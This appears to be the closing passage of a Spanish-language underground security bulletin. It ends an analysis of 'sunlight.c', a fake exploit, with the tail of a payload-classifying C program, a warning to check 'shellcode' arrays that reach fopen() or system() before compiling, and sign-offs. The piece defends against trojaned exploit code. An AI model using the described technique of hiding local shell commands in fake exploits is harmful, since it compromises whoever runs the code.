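           (int)classify_payload(SAMPLE_MACHINE_CODE, sizeof SAMPLE_MACHINE_CODE - 1));
    return 0;
}
```

Pointer arithmetic into a "shellcode" array that ends up in fopen() or system(), as in sunlight.c, is itself the red flag worth grepping for before compiling anything: a genuine remote exploit sends its payload over the socket and never hands it to the local shell.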


As you can see, a lot of code circulates on the net; some of it is real and some is fake like the one we analyzed, so be careful with what you run.

Author: Diego Krahenbuhl

[5] Links


[6] The End

This is the end..see you on tha next bulletin.


Disconnect

**Lost contact with the d00d**
**Objective not found**

Cheers..

Zero_Byte mailto:info@rootmode.com.ar

------------------------------------
[Zero_Byte] info@rootmode.com.ar
Computer security and Underground
==> http://rootmode.com.ar <==
------------------------------------
